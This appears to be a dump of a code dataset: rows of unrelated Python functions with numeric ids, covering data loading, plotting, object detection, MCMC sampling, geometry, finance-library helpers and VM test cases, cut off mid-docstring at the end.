content stringlengths 22 815k | id int64 0 4.91M |
|---|---|
def household_id_list(filelist, pidp):
    """For a set of waves, obtain a list of household IDs belonging to the same individual.

    Args:
        filelist: Ordered list of per-wave tab-separated file paths (wave 1 first).
        pidp: Personal identifier to look up in each wave file.

    Returns:
        list: One array of household IDs (the wave's ``<prefix>_hidp`` column values)
        per wave in which ``pidp`` appears.
    """
    # Wave number -> variable-name prefix used in the survey column names.
    wave_prefix = {1: 'a', 2: 'b', 3: 'c', 4: 'd', 5: 'e', 6: 'f', 7: 'g'}
    hidp_list = []
    wave_list = []
    for wave, name in enumerate(filelist, start=1):
        print("Loading wave %d data..." % wave)
        df = pd.read_csv(name, sep='\t')
        if pidp in df['pidp'].values:
            kword = wave_prefix[wave] + '_hidp'
            hidp = df.loc[df['pidp'] == pidp, kword].values
            hidp_list.append(hidp)
            wave_list.append(wave)
    # Original mixed %-formatting and str.format in a single statement;
    # use one consistent style.
    print("\nIndividual %d present in waves %s" % (pidp, wave_list))
    return hidp_list
def biggest_labelizer_arbitrary(metrics: dict, choice: str, *args, **kwargs) -> Tuple[str, float]:
    """Return (key, value) for the maximal value in *metrics*.

    When several keys tie for the maximum and *choice* is among them,
    *choice* wins the tie; otherwise the first tied key in dict order
    is returned.
    """
    keys = list(metrics.keys())
    values = list(metrics.values())
    best = max(values)
    # Keys whose value equals the maximum, preserving dict order.
    tied = [k for k, v in zip(keys, values) if v == best]
    if len(tied) > 1 and choice in tied:
        return choice, best
    return tied[0], best
def _seaborn_viz_histogram(data, x: str, contrast: Optional[str] = None, **kwargs):
    """Plot a single histogram.

    Args:
        data (DataFrame): The data
        x (str): The name of the column to plot.
        contrast (str, optional): The name of the categorical column to use for multiple contrasts.
        **kwargs: Keyword arguments passed to seaborn.histplot

    Raises:
        ValueError: Not a numeric column.

    Returns:
        Seaborn Axis Object
    """
    if x not in data.select_dtypes("number").columns:
        raise ValueError("x must be numeric column")
    default_hist_kwargs: Dict[str, Any] = {}
    hist_kwargs = {**default_hist_kwargs, **(kwargs or {})}
    if contrast:
        # Cast the contrast column on a copy so the caller's DataFrame is
        # not mutated as a side effect of plotting (the original assigned
        # the category-cast column back into the caller's frame).
        data = data.assign(**{contrast: data[contrast].astype("category")})
        ax = sns.histplot(x=x, hue=contrast, data=data, **hist_kwargs)
    else:
        ax = sns.histplot(data[x], **hist_kwargs)
    ax.set_title(f"Histogram of {x}")
    return ax
def test_connect_args():
    """Verify the engine built from the connect string can execute a query."""
    engine = conftest.get_engine()
    try:
        row = engine.execute('select version from sys.version').fetchone()
        assert row is not None
    finally:
        # Always release the connection pool, even if the query fails.
        engine.dispose()
def str2bool(s):
    """
    Description:
    ----------
        Convert an input string (or a dict of strings) to boolean(s).
    Arguments:
    ----------
        [NAME] [TYPE] [DESCRIPTION]
        (1) s dict, str The string to convert, or a dict whose values
            are converted recursively in place.
    Returns:
    ----------
        bool when *s* is a string: True iff it is one of "yes", "true",
        "t", "1" (case-insensitive). When *s* is a dict, the same dict
        with its values converted.
    """
    if isinstance(s, dict):
        for key in s:
            s[key] = str2bool(s[key])
        # Original returned None for dicts; returning the converted dict
        # is backward-compatible and more useful.
        return s
    # Original referenced an undefined name `v` here (NameError); the
    # parameter is `s`.
    return s.lower() in ("yes", "true", "t", "1")
def im_detect(net, im, boxes=None):
    """Detect object classes in an image given object proposals.
    Arguments:
        net (caffe.Net): Fast R-CNN network to use
        im (ndarray): color image to test (in BGR order)
        boxes (ndarray): R x 4 array of object proposals or None (for RPN)
    Returns:
        raw_scores (ndarray): raw 'cls_score' blob values (pre-softmax)
        scores (ndarray): R x K array of object class scores (K includes
            background as object category 0)
        fc7 (ndarray): fc7 feature activations for each ROI
        boxes (ndarray): R x (4*K) array of predicted bounding boxes
    """
    blobs, im_scales = _get_blobs(im, boxes)
    # When mapping from image ROIs to feature map ROIs, there's some aliasing
    # (some distinct image ROIs get mapped to the same feature ROI).
    # Here, we identify duplicate feature ROIs, so we only compute features
    # on the unique subset.
    # if cfg.DEDUP_BOXES > 0 and not cfg.TEST.HAS_RPN:
    # v = np.array([1, 1e3, 1e6, 1e9, 1e12])
    # hashes = np.round(blobs['rois'] * cfg.DEDUP_BOXES).dot(v)
    # _, index, inv_index = np.unique(hashes, return_index=True,
    # return_inverse=True)
    # blobs['rois'] = blobs['rois'][index, :]
    # boxes = boxes[index, :]
    if cfg.TEST.HAS_RPN:
        im_blob = blobs['data']
        # im_info is (input height, input width, scale) for the RPN.
        blobs['im_info'] = np.array(
            [[im_blob.shape[2], im_blob.shape[3], im_scales[0]]],
            dtype=np.float32)
    # reshape network inputs
    net.blobs['data'].reshape(*(blobs['data'].shape))
    if cfg.TEST.HAS_RPN:
        net.blobs['im_info'].reshape(*(blobs['im_info'].shape))
    else:
        net.blobs['rois'].reshape(*(blobs['rois'].shape))
    # do forward
    forward_kwargs = {'data': blobs['data'].astype(np.float32, copy=False)}
    if cfg.TEST.HAS_RPN:
        forward_kwargs['im_info'] = blobs['im_info'].astype(np.float32, copy=False)
    else:
        forward_kwargs['rois'] = blobs['rois'].astype(np.float32, copy=False)
    blobs_out = net.forward(**forward_kwargs)
    if cfg.TEST.HAS_RPN:
        assert len(im_scales) == 1, "Only single-image batch implemented"
        rois = net.blobs['rois'].data.copy()
        # unscale back to raw image space
        boxes = rois[:, 1:5] / im_scales[0]
    if cfg.TEST.SVM:
        # use the raw scores before softmax under the assumption they
        # were trained as linear SVMs
        scores = net.blobs['cls_score'].data
    else:
        # use softmax estimated probabilities
        scores = blobs_out['cls_prob']
    # if cfg.TEST.BBOX_REG:
    # NOTE(review): bounding-box regression is hard-disabled via `if False`;
    # confirm this is intentional before relying on pred_boxes accuracy.
    if False:
        # Apply bounding-box regression deltas
        box_deltas = blobs_out['bbox_pred']
        pred_boxes = bbox_transform_inv(boxes, box_deltas)
        pred_boxes = clip_boxes(pred_boxes, im.shape)
    else:
        # Simply repeat the boxes, once for each class
        pred_boxes = np.tile(boxes, (1, scores.shape[1]))
    # if cfg.DEDUP_BOXES > 0 and not cfg.TEST.HAS_RPN:
    # # Map scores and predictions back to the original set of boxes
    # scores = scores[inv_index, :]
    # pred_boxes = pred_boxes[inv_index, :]
    # fc7 features are also returned, presumably for downstream feature
    # extraction — confirm against callers.
    fc7 = net.blobs['fc7'].data
    return net.blobs['cls_score'].data[:, :], scores, fc7, pred_boxes
def preCSVdatagen(xy_p, radius, nbin, PlainFirst):
"""Format the data before generating the csv input for ili'.
Args:
xy_p (str): path to the X and Y coordiantes of ablation marks .npy file.
radius (int): displayed radius of the marks in ili'.
nbin (int): bin factor used to bin the image for ili'.
PlainFirst (bool): intensity values of each datapoints are equal to 1. Used to visualize the ablation mark
coordinates on the postMALDI brighfield in ili'.
Returns:
data (list): formatted data (2D).
"""
X, Y = np.load(xy_p)
Xs = X /( nbin) # todo check relevance of Y <-> X
Ys = Y /( nbin)
Ys = Ys - np.min(Ys)
Xs = Xs - np.min(Xs)
Rs = np.ones(np.shape(Xs)) * radius
data = []
data.append(list(np.append('Num', list(range(np.shape(Xs.ravel())[0])))))
data.append(list(np.append('X', Ys.ravel())))
data.append(list(np.append('Y', Xs.ravel())))
data.append(list(np.append('Z', np.zeros(np.shape(Xs.ravel())))))
data.append(list(np.append('R', Rs.ravel())))
if PlainFirst:
data.append(list(np.append('Flat', np.ones(np.shape(Xs.ravel())))))
return data | 5,333,506 |
def dispatch_error_adaptor(func):
    """Construct a signature isomorphic to dispatch_error.

    The actual handler will receive only arguments explicitly
    declared, and a possible tg_format parameter.
    """
    def adaptor(controller, tg_source, tg_errors, tg_exceptions, *args, **kw):
        tg_format = kw.pop('tg_format', None)
        provided = {
            "tg_source": tg_source,
            "tg_errors": tg_errors,
            "tg_exceptions": tg_exceptions,
        }
        # Only inject the tg_* values the handler actually declares.
        args, kw = inject_args(func, provided, args, kw, 1)
        args, kw = adapt_call(func, args, kw, 1)
        if tg_format is not None:
            kw['tg_format'] = tg_format
        return func(controller, *args, **kw)
    return adaptor
def address_split(address, env=None):
    """The address_split() function splits an address into its four
    components. Address strings are on the form
    detector-detectorID|device-deviceID, where the detectors must be in
    dir(xtc.DetInfo.Detector) and device must be in
    (xtc.DetInfo.Device).
    @param address Full data source address of the DAQ device
    @param env Optional env to dereference an alias into an address
    @return Four-tuple of detector name, detector ID, device, and
            device ID
    """
    import re
    # The three accepted spellings: pyana, psana, and psana DetInfo string.
    patterns = (
        r"^(?P<det>\S+)\-(?P<det_id>\d+)\|(?P<dev>\S+)\-(?P<dev_id>\d+)$",
        r"^(?P<det>\S+)\.(?P<det_id>\d+)\:(?P<dev>\S+)\.(?P<dev_id>\d+)$",
        r"^DetInfo\((?P<det>\S+)\.(?P<det_id>\d+)\:(?P<dev>\S+)\.(?P<dev_id>\d+)\)$",
    )
    for pattern in patterns:
        m = re.match(pattern, address)
        if m is not None:
            return (m.group('det'), m.group('det_id'),
                    m.group('dev'), m.group('dev_id'))
    if env is not None:
        # Try to see if this is a detector alias, and if so, dereference it.
        # Code from psana's Detector/PyDetector.py
        amap = env.aliasMap()
        alias_src = amap.src(address)  # string --> DAQ-style psana.Src
        # if it is an alias, look up the full name
        if amap.alias(alias_src) != '':  # alias found
            address = str(alias_src)
            return address_split(address)
    return (None, None, None, None)
def solveGroth(A, n, init_val=None):
    """
    Iteratively minimize y^T A y over reweighted leading eigenvectors using a
    multiplicative-weights-style update, stopping early when an iterate (or
    the running average) satisfies ``checkCondition``.

    Parameters
    ----------
    A: np.matrix
        Symmetric matrix defining the quadratic objective y^T A y.
    n: int
        Problem dimension (length of the iterate vectors).
    init_val: array-like, optional
        Initial weight vector; defaults to the all-ones vector.

    Returns
    -------
    list of
        ndarray: rank-one matrix built from the best iterate (or, in the
            averaged-exit branch, the scaled ``avg_X`` accumulator —
            NOTE(review): ``avg_X`` is never updated in the loop, so that
            branch returns zeros; confirm intent).
        float: minimum objective value observed.
        ndarray: weight vector at the minimizing iterate.
        ndarray: running sum of squared iterates (``avg_y_val``).
    """
    eps=0.5
    eta=0.05
    threshold = 1.1
    N = n
    Ap = A
    if init_val is not None:
        w=init_val
    else:
        w = np.ones(N)
    # Upper bound on the objective, used to track the running minimum.
    min_val = np.sum(np.abs(Ap))
    curr_y = np.zeros(N)
    curr_alpha = np.zeros(N)
    avg_y_val = np.zeros(N)
    avg_X=np.zeros((N,N))
    avg_alpha=np.zeros(N)
    T=4*N
    schedule_size = round(T/8) #We change eps in epochs
    print("iteration bound:",T)
    # NOTE(review): z, g, and both start_time assignments below are computed
    # but never used in any return value — confirm they can be removed.
    z = np.zeros(N)
    vals = 0
    g = np.random.standard_normal(T)
    for i in range(T):
        # eps annealing: hard reset at the halfway point, plus two
        # epoch-based halving rules (the last two overlap after T/2).
        if (i+1)%(T/2)==0:
            eps=0.01
        if i%schedule_size ==0 and eps>0.01 :
            eps=eps/2
        if i%schedule_size == 0 and i>T/2:
            eps /= 2
        # Smooth the weights toward uniform before rescaling.
        wtil=(1-eta)*w+eta*np.ones(N)
        w1 = np.array([1/np.sqrt(j) for j in wtil])
        start_time = time.time()
        # M = D^{-1/2} Ap D^{-1/2} where D = diag(wtil).
        d = np.tile(w1, (N, 1))
        M = np.multiply(Ap,d)
        d = np.tile(np.array([w1]).transpose(), (1,N))
        M = np.multiply(M,d)
        start_time = time.time()
        # Leading (largest algebraic) eigenvector of the reweighted matrix.
        eigval, eigvec = lasp.eigsh(M, k=1, which='LA', tol=0.00001)
        y = eigvec[:,0]
        y *= np.sqrt(N)
        y = np.multiply(y,w1)
        avg_y_val += y**2
        val = np.matmul(np.transpose(y), np.matmul(Ap,y))
        avg_alpha+=val*w
        if val < min_val:
            min_val = val
            curr_y = y
            curr_alpha = w
        vals += val
        print("iterate", i, "val = ", val, " minval=", min_val, " linf of curr y=", np.max(np.abs(y**2)) , " infinity norm avg X =", np.max((1.0/(i+1))*avg_y_val), "SDP sol val:", vals/(i+1), "eps,eta=", eps, " , ", eta)
        if checkCondition(y,threshold):
            print(y,"Current iterate Condition satisfied, i : ",i)
            print("min val = ", min_val)
            print("curr_y = ", curr_y)
            print("curr_alpha = ", curr_alpha)
            print("inf norm of curr_y=", max(abs(curr_y)))
            return [np.matmul(curr_y,curr_y.T),min_val, curr_alpha, avg_y_val]
        elif checkCondition((1.0/(i+1))*avg_y_val, threshold):
            avg_y_val=(1.0/(i+1))*avg_y_val
            avg_val = vals/(i+1)
            print(avg_y_val," Avg Condition satisfied, i : ",i)
            print("min val = ", min_val)
            print("curr val=", avg_val)
            print("curr_alpha = ", (1.0/i)*avg_alpha)
            print("inf norm of avg_y=", max(abs(avg_y_val)))
            return [(1.0/(i+1))*avg_X,min_val, curr_alpha, avg_y_val]
        # Different weight-update rule (and step size) in the second half.
        if i < T/2:
            w = updateWeights_2(w,y,threshold, eps, N)
        else:
            w = updateWeights(w,y,threshold, 2*eps, N)
        u = y*g[i]
        z += u
    print("min val = ", min_val)
    print("sum of curr_alpha = ", sum(curr_alpha))
    print("sum weights at end = ", sum(w))
    print("inf norm of curr_y=", max(abs(curr_y)))
    return [np.matmul(curr_y, curr_y.T), min_val, curr_alpha, avg_y_val]
def verify_any(func, *args, **kwargs):
    """Check that at least one result of ``func(*args, **kwargs)`` is truthy.

    Thin wrapper delegating to the module-level ``_verify`` helper in
    'any' mode.
    """
    return _verify(func, 'any', *args, **kwargs)
def can_create_election(user_id, user_info):
    """Permission check for election creation; currently everyone is allowed."""
    return True
def get_system_language():
    """Get the system language and locale as a (language, encoding) tuple."""
    try:
        language, encoding = locale.getdefaultlocale()
    except ValueError:
        if IS_MAC:
            # Fix for "ValueError: unknown locale: UTF-8" on Mac.
            # The default English locale on Mac is set as "UTF-8" instead
            # of "en-US.UTF-8"; see https://bugs.python.org/issue18378
            return 'en_US', 'UTF-8'
        # re-throw any other issue
        raise
    return language, encoding
def circle_pattern(pattern_radius,
                   circle_radius,
                   count,
                   center=(0.0, 0.0),
                   angle=None,
                   **kwargs):
    """
    Create a Path2D representing a circle pattern.
    Parameters
    ------------
    pattern_radius : float
      Radius of circle centers
    circle_radius : float
      The radius of each circle
    count : int
      Number of circles in the pattern
    center : (2,) float
      Center of pattern
    angle : float
      If defined pattern will span this angle
      If None, pattern will be evenly spaced
    Returns
    -------------
    pattern : trimesh.path.Path2D
      Path containing circular pattern
    """
    from .path import Path2D
    if angle is None:
        # evenly spaced: drop the duplicate endpoint at 2*pi
        angles = np.linspace(0.0, np.pi * 2.0, count + 1)[:-1]
    elif isinstance(angle, (float, int)):
        angles = np.linspace(0.0, angle, count)
    else:
        raise ValueError('angle must be float or int!')
    # centers of circles
    centers = np.column_stack((
        np.cos(angles), np.sin(angles))) * pattern_radius
    vert = []
    ents = []
    for circle_center in centers:
        # (3,3) center points of arc
        three = arc.to_threepoint(angles=[0, np.pi],
                                  center=circle_center,
                                  radius=circle_radius)
        # add a single circle entity
        ents.append(
            Arc(
                points=np.arange(3) + len(vert),
                closed=True))
        # keep flat array by extend instead of append
        vert.extend(three)
    # translate vertices to pattern center
    # (default `center` is now an immutable tuple: the original mutable
    # list default could leak state if a caller mutated it)
    vert = np.array(vert) + center
    pattern = Path2D(entities=ents,
                     vertices=vert,
                     **kwargs)
    return pattern
def boolean(input):
    """Convert the given input to a boolean value.
    Intelligently handles boolean and non-string values, returning
    as-is and passing to the bool builtin respectively.
    This process is case-insensitive.
    Acceptable values:
    True
        * yes
        * y
        * on
        * true
        * t
        * 1
    False
        * no
        * n
        * off
        * false
        * f
        * 0
    :param input: the value to convert to a boolean
    :type input: any
    :returns: converted boolean value
    :rtype: bool
    """
    try:
        normalized = input.strip().lower()
    except AttributeError:
        # Not string-like: defer to the bool builtin.
        return bool(input)
    if normalized in ('yes', 'y', 'on', 'true', 't', '1'):
        return True
    if normalized in ('no', 'n', 'off', 'false', 'f', '0'):
        return False
    # Report the normalized value, matching the original behavior.
    raise ValueError("Unable to convert {0!r} to a boolean value.".format(normalized))
def check_analyzed_packages_count(context, num=1):
    """Check that the response reports exactly *num* analyzed packages."""
    context_reponse_existence_check(context)
    payload = context.response.json()
    check_attribute_presence(payload, "result")
    result = payload["result"]
    check_attribute_presence(result, "data")
    data = result["data"]
    assert len(data) == num, "{} packages expected, but found {} instead".format(num, len(data))
def generate_edges(graph, bucketing='epsilon', eps=1e-2, k=3):
"""Generate the set of edges
"""
u, v, w = find(graph)
if bucketing == 'epsilon':
w_prime = np.array(w/eps, dtype=np.int32)
elif bucketing == 'kmeans':
clf = KMeans(n_clusters=k)
clf.fit(w.reshape((-1, 1)))
centers, labels = clf.cluster_centers_, clf.labels_
w_prime = centers[labels]
list_edges = list(zip(u, v, w, w_prime))
list_edges.sort(key=lambda x: -x[2])
cur_weight = list_edges[0][3]
edges_bucket = []
for e in list_edges:
if np.abs(e[3] - cur_weight) < 1e-7:
edges_bucket.append(e)
else:
yield edges_bucket
edges_bucket = []
cur_weight = e[3]
yield edges_bucket | 5,333,516 |
def find_horizontal_up_down_links(tc, u, out_up=None, out_down=None):
    """Find indices of nodes that locate
    at horizontally upcurrent and downcurrent directions.

    Args:
        tc: object exposing ``link_west`` and ``link_east`` index arrays.
        u (ndarray): horizontal velocity at each link; the sign selects
            which neighbour is "upcurrent".
        out_up (ndarray, optional): preallocated output for upcurrent indices.
        out_down (ndarray, optional): preallocated output for downcurrent indices.

    Returns:
        (out_up, out_down): west/east neighbour indices, swapped where u < 0.
    """
    if out_up is None:
        # np.int was removed in NumPy 1.24; the builtin int dtype is equivalent.
        out_up = np.zeros(u.shape[0], dtype=int)
    if out_down is None:
        out_down = np.zeros(u.shape[0], dtype=int)
    # Default (u >= 0): flow toward the east, so upcurrent is the west link.
    out_up[:] = tc.link_west[:]
    out_down[:] = tc.link_east[:]
    # Where the velocity is negative the roles are reversed.
    negative_u_index = np.where(u < 0)[0]
    out_up[negative_u_index] = tc.link_east[negative_u_index]
    out_down[negative_u_index] = tc.link_west[negative_u_index]
    return out_up, out_down
def PyParser_SimpleParseStringFlagsFilename(space, str, filename, start, flags):
    """Parse Python source code from str using the start token start according to
    the flags argument. The result can be used to create a code object which can
    be evaluated efficiently. This is useful if a code fragment must be evaluated
    many times. filename is decoded from the filesystem encoding
    (sys.getfilesystemencoding())."""
    # CPython C-API stub: this function is not implemented here.
    raise NotImplementedError
def write_file(filename, content):
    """Write content to a file and set the correct file permission """
    # os.open lets us apply the restrictive 0o600 mode at creation time.
    fd = os.open(filename, os.O_CREAT | os.O_WRONLY, 0o600)
    with os.fdopen(fd, 'w') as file:
        yaml.safe_dump(content, file, default_flow_style=False, sort_keys=False)
def _compute_composite_beta(model, robo, j, i):
    """
    Compute the composite beta wrench for link i.
    Args:
        model: An instance of DynModel
        robo: An instance of Robot
        j: link number
        i: antecedent value
    Returns:
        An instance of DynModel that contains all the new values.
    """
    i_beta_i_c = Screw()
    # local variables
    # screw transform between frames i and j (attribute name suggests
    # "s of i with respect to j")
    j_s_i = robo.geos[j].tmat.s_i_wrt_j
    i_beta_i = model.composite_betas[i].val
    j_beta_j_c = model.composite_betas[j].val
    j_inertia_j_c = model.composite_inertias[j].val
    j_zeta_j = model.zetas[j].val
    # actual computation:
    # parent's beta plus the child's composite beta minus the child's
    # inertial term, both mapped through the transposed screw transform.
    i_beta_i_c.val = i_beta_i + (j_s_i.transpose() * j_beta_j_c) - \
        (j_s_i.transpose() * j_inertia_j_c * j_zeta_j)
    # store computed beta in model
    model.composite_betas[i] = i_beta_i_c
    return model
def check_system_type(product_dict):
    """Validate the ``System_Type`` entry of the product information dict.

    Parameters
    ----------
    product_dict : dict
        YAML-derived product information.

    Raises
    ------
    AssertionError
        If ``System_Type`` is missing/falsy, not an integer, or outside
        the 1..30 index range.
    """
    # System type assertions (original fetched the value twice; once is enough).
    system_type = product_dict.get('System_Type', '')
    assert system_type, 'Input file requires system type'
    # type() check (not isinstance) deliberately rejects bools, matching
    # the original behavior.
    assert type(system_type) == int, 'Input file requires integer input'
    assert 1 <= system_type <= 30, 'System type input not within range of index'
def pos(x, y):
    """Returns floored and camera-offset x,y tuple.
    Setting out of bounds is possible, but getting is not; mod in callers for get_at.
    """
    # Apply the camera offset (module globals xo/yo), then floor.
    screen_x = flr(xo + x)
    screen_y = flr(yo + y)
    return (screen_x, screen_y)
def test_create_vm_on_available_memory_node(request, admin_session, image,
                                            keypair, harvester_api_endpoints):
    """
    Create VM with resource with one node in cluster memory
    Covers:
        virtual-machines-72-vm with resource with one node in cluster memory
    """
    # find out the node that has the most available memory
    (nodes, available_memory) = utils.lookup_hosts_with_most_available_memory(
        admin_session, harvester_api_endpoints)
    # now create a VM using the most available memory to ensure it will only be
    # scheduled on the host that has that resource
    assert available_memory > 0, 'No nodes has enough memory to create VMs'
    vm_json = None
    try:
        # available_memory is passed as memory_gb, so it is presumably in
        # gigabytes — TODO confirm against the utils helper.
        vm_json = utils.create_vm(request, admin_session, image,
                                  harvester_api_endpoints, keypair=keypair,
                                  memory_gb=available_memory)
        vm_instance_json = utils.lookup_vm_instance(
            admin_session, harvester_api_endpoints, vm_json)
        vm_node = vm_instance_json['status']['nodeName']
        assert vm_node in nodes, (
            'Expect VM to be running on node %s, but it is running on node '
            '%s' % (nodes, vm_node))
    finally:
        # clean up the VM even if the assertions above failed
        if vm_json:
            utils.delete_vm(request, admin_session, harvester_api_endpoints,
                            vm_json)
def _check_blockstream_for_transactions(
        accounts: List[BTCAddress],
) -> Dict[BTCAddress, Tuple[bool, FVal]]:
    """Query blockstream.info for each account's balance and tx activity.

    May raise connection errors or KeyError.
    """
    result = {}
    for account in accounts:
        url = f'https://blockstream.info/api/address/{account}'
        response_data = request_get_dict(url=url, handle_429=True, backoff_in_seconds=4)
        stats = response_data['chain_stats']
        # Net balance = funded minus spent outputs, converted to BTC.
        net_satoshis = int(stats['funded_txo_sum']) - int(stats['spent_txo_sum'])
        has_txs = stats['tx_count'] != 0
        result[account] = (has_txs, satoshis_to_btc(net_satoshis))
    return result
def metropolis_hastings(
        proposal: Proposal,
        state: State,
        step_size: float,
        ns: int,
        unif: float,
        inverse_transform: Callable
) -> Tuple[State, Info, np.ndarray, bool]:
    """Computes the Metropolis-Hastings accept-reject criterion given a proposal, a
    current state of the chain, a integration step-size, and a number of
    itnegration steps. We also provide a uniform random variable for
    determining the accept-reject criterion and the inverse transformation
    function for transforming parameters from an unconstrained space to a
    constrained space.
    Args:
        proposal: A proposal operator to advance the state of the Markov chain.
        state: An augmented state object with the updated position and momentum
            and values for the log-posterior and metric and their gradients.
        step_size: The integration step-size.
        num_steps: The number of integration steps.
        unif: Uniform random number for determining the accept-reject decision.
        inverse_transform: Inverse transformation to map samples back to the
            original space.
    Returns:
        state: An augmented state object with the updated position and momentum
            and values for the log-posterior and metric and their gradients.
        info: An information object with the updated number of fixed point
            iterations and boolean indicator for successful integration.
        q: The position variable in the constrained space.
        accept: Whether or not the proposal was accepted.
    """
    # Hamiltonian (energy) of the current state.
    ham = hamiltonian(
        state.momentum,
        state.log_posterior,
        state.logdet_metric,
        state.inv_metric)
    q, fldj = inverse_transform(state.position)
    ildj = -fldj
    new_state, prop_info = proposal.propose(state, step_size, ns)
    # NOTE(review): new_chol and new_logdet are computed but never used
    # below — confirm they can be removed.
    new_chol, new_logdet = new_state.sqrtm_metric, new_state.logdet_metric
    new_q, new_fldj = inverse_transform(new_state.position)
    new_ham = hamiltonian(
        new_state.momentum,
        new_state.log_posterior,
        new_state.logdet_metric,
        new_state.inv_metric)
    # Notice the relevant choice of sign when the Jacobian determinant of the
    # forward or inverse transform is used.
    #
    # Write this expression as,
    # (exp(-new_ham) / exp(new_fldj)) / (exp(-ham) * exp(ildj))
    #
    # See the following resource for understanding the Metropolis-Hastings
    # correction with a Jacobian determinant correction [1].
    #
    # [1] https://wiki.helsinki.fi/download/attachments/48865399/ch7-rev.pdf
    logu = np.log(unif)
    metropolis = logu < ham - new_ham - new_fldj - ildj + prop_info.logdet
    # Accept only if the integrator also reported success.
    accept = np.logical_and(metropolis, prop_info.success)
    if accept:
        state = new_state
        q = new_q
        ildj = -new_fldj
    # Negate the momentum in place; presumably for proposal reversibility
    # (standard in HMC-style samplers) — confirm against `proposal.propose`.
    state.momentum *= -1.0
    return state, prop_info, q, accept
def continuous_future(root_symbol_str, offset=0, roll="volume", adjustment="mul", bundle=None):
    """
    Return a ContinuousFuture object for the specified root symbol in the specified bundle
    (or default bundle).
    Parameters
    ----------
    root_symbol_str : str
        The root symbol for the future chain.
    offset : int, optional
        The distance from the primary contract. Default is 0.
    roll : str, optional
        How rolls are determined. Possible choices: 'volume',
        (roll when back contract volume exceeds front contract
        volume), or 'calendar' (roll on rollover date). Default
        is 'volume'.
    adjustment : str, optional
        Method for adjusting lookback prices between rolls. Options are
        'mul', 'add' or None. 'mul' calculates the ratio of front and back
        contracts on the roll date ((back - front)/front) and multiplies
        front contract prices by (1 + ratio). 'add' calculates the difference
        between back and front contracts on the roll date (back - front)
        and adds the difference to front contract prices. None concatenates
        contracts without any adjustment. Default is 'mul'.
    bundle : str, optional
        the bundle code. If omitted, the default bundle will be used (and must be set).
    Returns
    -------
    asset : zipline.assets.ContinuousFuture
    Examples
    --------
    Get the continuous future object for ES and get the current chain as of
    2020-09-18:
    >>> es = continuous_future("ES", roll="volume", bundle="es-1min") # doctest: +SKIP
    >>> data = get_data("2020-09-18 10:00:00", bundle="es-1min") # doctest: +SKIP
    >>> print(data.current_chain(es)) # doctest: +SKIP
    """
    if not bundle:
        bundle = get_default_bundle()
        if not bundle:
            raise ValidationError("you must specify a bundle or set a default bundle")
        # get_default_bundle() returns a dict; extract the bundle code string.
        bundle = bundle["default_bundle"]
    load_extensions(code=bundle)
    bundle_data = bundles.load(
        bundle,
        os.environ,
        pd.Timestamp.utcnow(),
    )
    # Reuse a previously-built asset finder for this bundle when available,
    # then (re)store it in the module-level cache.
    asset_finder = asset_finder_cache.get(bundle, bundle_data.asset_finder)
    asset_finder_cache[bundle] = asset_finder
    continuous_future = asset_finder.create_continuous_future(
        root_symbol_str,
        offset,
        roll,
        adjustment,
    )
    return continuous_future
def Now():
    """Returns a datetime.datetime instance representing the current time.
    This is just a wrapper to ease testing against the datetime module.
    Returns:
        An instance of datetime.datetime.
    """
    current_time = datetime.datetime.now()
    return current_time
def test_basic_auth_with_session(basic_auth_client):
    """Exercise HTTP basic auth through a client session."""
    res = None
    with basic_auth_client._session() as session:
        res = session.basic_auth('user', 'password')
    assert res['authenticated'] is True
def ndvi_list_hdf(hdf_dir, satellite=None):
    """
    List all the available HDF files, grouped by tile
    Args:
        hdf_dir: directory containing one subdirectory per year which contains
            HDF files
        satellite: None to select both Tera and Aqua, 'mod13q1' for MODIS,
            'myd13q1' for Aqua
    Returns:
        dict: A dict (keyed by tilename) of lists of (full filepath,
        timestamp_ms) tuples, sorted by timestamp_ms
    """
    files = collections.defaultdict(list)
    for subdir in os.listdir(hdf_dir):
        subdir = os.path.join(hdf_dir, subdir)
        if not os.path.isdir(subdir):
            continue
        for hdf_file in os.listdir(subdir):
            if not hdf_file.endswith('.hdf'):
                continue
            try:
                full_fname = os.path.join(subdir, hdf_file)
                d = parse_ndvi_filename(hdf_file)
                if satellite is not None and satellite != d['satellite']:
                    continue
                files[d['tile_name']].append((full_fname, d['timestamp_ms']))
            except ValueError as e:
                # Unparseable filename: report and skip. (Original used the
                # Python 2 print statement, a syntax error in Python 3.)
                print(e)
    for tile_name in files.keys():
        files[tile_name] = sorted(files[tile_name], key=lambda t: t[1])
    return files
def read_levels(dir_path: str,
                progress_monitor: PyramidLevelCallback = None) -> List[xr.Dataset]:
    """
    Read the of a multi-level pyramid with spatial resolution
    decreasing by a factor of two in both spatial dimensions.

    Each level is either a ``<index>.zarr`` directory or a ``<index>.link``
    file whose content is the path of the zarr store to open.

    :param dir_path: The directory path.
    :param progress_monitor: An optional progress monitor.
    :return: A list of dataset instances representing the multi-level pyramid.
    :raise ValueError: If the numeric entries in the directory do not form a
        contiguous set of level indices.
    """
    file_paths = os.listdir(dir_path)
    level_paths = {}
    num_levels = -1
    for filename in file_paths:
        file_path = os.path.join(dir_path, filename)
        basename, ext = os.path.splitext(filename)
        if basename.isdigit():
            index = int(basename)
            # Highest numeric basename + 1 determines the expected level count.
            num_levels = max(num_levels, index + 1)
            if os.path.isfile(file_path) and ext == ".link":
                level_paths[index] = (ext, file_path)
            elif os.path.isdir(file_path) and ext == ".zarr":
                level_paths[index] = (ext, file_path)
    # Guards against gaps or unrecognized numeric entries before opening.
    if num_levels != len(level_paths):
        raise ValueError(f"Inconsistent pyramid directory:"
                         f" expected {num_levels} but found {len(level_paths)} entries:"
                         f" {dir_path}")
    levels = []
    for index in range(num_levels):
        ext, file_path = level_paths[index]
        if ext == ".link":
            # A .link file holds the path of the actual zarr store.
            with open(file_path, "r") as fp:
                link_file_path = fp.read()
            dataset = xr.open_zarr(link_file_path)
        else:
            dataset = xr.open_zarr(file_path)
        if progress_monitor is not None:
            progress_monitor(dataset, index, num_levels)
        levels.append(dataset)
    return levels
def register_type_representer(t, func):
    """
    Register a function that will act as a type representer for the specified type.

    Parameters:
        t: the type
        func: the function that will be used to produce a representation for
            values of type t
    """
    # Later registrations for the same type overwrite earlier ones.
    typerepresenters[t] = func
def test_cback():
    """
    Test the C backend.
    """
    results = ising.__main__.main(pass_args=__ARGS + ["--backend", "c"], test=True)
    # Every result the backend produced must be non-None.
    assert all(result is not None for result in results)
def create_provisioned_product_name(account_name: str) -> str:
    """
    Replaces all space characters in an Account Name with hyphens,
    also removes all trailing and leading whitespace
    """
    trimmed = account_name.strip()
    return trimmed.replace(" ", "-")
def case34():
    """
    Create the IEEE 34 bus network from the IEEE PES Test Feeders:
